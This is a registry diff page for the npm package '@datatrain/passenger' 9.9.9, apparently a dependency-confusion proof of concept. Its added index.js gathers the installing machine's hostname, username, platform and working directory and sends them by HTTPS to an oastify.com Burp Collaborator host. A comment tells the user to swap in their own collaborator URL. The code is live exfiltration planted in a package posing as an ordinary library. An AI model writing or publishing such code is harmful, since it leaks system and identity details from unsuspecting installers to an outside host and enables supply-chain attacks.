@datatrain/passenger 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/datatrain-passenger-9.9.9.tgz +0 -0
- package/index.js +12 -0
- package/package.json +5 -0
- package/package.json# +5 -0
- package/passenger-poc/package.json +13 -0
|
Binary file
|
package/index.js
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
|
|
4
|
+
const data = encodeURIComponent(JSON.stringify({
|
|
5
|
+
hostname: os.hostname(),
|
|
6
|
+
user: os.userInfo().username,
|
|
7
|
+
platform: os.platform(),
|
|
8
|
+
cwd: process.cwd(),
|
|
9
|
+
}));
|
|
10
|
+
|
|
11
|
+
// Use your interactsh or Burp Collaborator URL
|
|
12
|
+
https.get(`https://hbwunubr4bn5imswuflo1uic339uxkl9.oastify.com?d=${data}`, () => {}).on('error', () => {});
|
package/package.json
ADDED
package/package.json#
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@datatrain/passenger-poc",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [],
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC",
|
|
12
|
+
"type": "commonjs"
|
|
13
|
+
}
|